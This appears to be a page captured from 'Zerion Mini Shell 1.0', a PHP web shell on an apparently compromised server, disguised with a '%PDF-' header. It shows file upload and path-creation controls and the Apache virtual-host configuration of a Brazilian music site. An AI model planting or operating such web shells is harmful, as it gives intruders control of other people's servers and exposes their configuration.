%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /etc/apache2/sites-available/
Upload File :
Create Path :
Current File : //etc/apache2/sites-available/gracamusic.com.br.conf

<VirtualHost *:80>
        ServerName new.gracamusic.com.br
        DocumentRoot /var/www/projetos/new.gracamusic.com.br
	<Directory /var/www/projetos/new.gracamusic.com.br>
		Options Indexes FollowSymLinks MultiViews
        	AllowOverride All
        	Order allow,deny
        	allow from all
	</Directory>
	ErrorLog ${APACHE_LOG_DIR}/error.gracamusic.com.log
	CustomLog ${APACHE_LOG_DIR}/access.gracamusic.com.log combined
RewriteEngine on
RewriteCond %{SERVER_NAME} =new.gracamusic.com.br
RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [END,NE,R=permanent]
</VirtualHost>

Zerion Mini Shell 1.0